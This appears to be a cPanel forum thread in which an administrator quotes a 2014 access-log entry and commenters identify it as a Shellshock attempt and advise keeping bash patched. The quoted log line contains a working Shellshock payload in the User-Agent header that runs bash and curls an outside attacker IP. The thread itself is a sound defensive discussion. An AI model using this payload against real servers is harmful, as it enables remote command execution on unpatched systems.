Skip to main content

requests with bash/curl in the browser signature

Comments

2 comments

  • cPanelMichael
    Hello :) I am happy to see you were able to determine the source of the attack. Thank you for updating us with the outcome.
    0
  • quizknows
    ]I see an increase in these types of attacks, requests with a bash execution of curl, which executes a remote piece of code. My question is, which application is vulnerable to this attack? something like a log reader, like "awstats"? There aren't many applications that read/parse/display server logs for browser signatures. Thank you!
    176.102.38.77 - - [20/Dec/2014:20:30:43 +0000] "HEAD /cgi-bin/ HTTP/1.1" 301 - "-" "() { :;}; /bin/bash -c 'curl http://176.102.38.77/search/e.php?h=domain.com/cgi-bin/'"
    [COLOR="silver">- - - Updated - - - Ah wait, that was just a simple shellshock attack... scratch that :) what kind of stupid admin executes bash from cgi-bin?... no wonder this bug did not affect my servers...

    You'd be surprised. Before bash was updated I saw a lot of boxes get hit, including cPanel stuff. It didn't necessarily have to be a bash script for it to work. They put the shellshock exploit code in every HTTP field you can think of (referrer, user agent, url, post data, etc). Anyway as long as your RPM updates run regularly and bash is up to date, nothing to see here. cPanel updates handle yum updates (RPM updates) for the most part anyway, so unless you're one of the fools who disables cPanel udpates entirely, you're fine.
    0

Please sign in to leave a comment.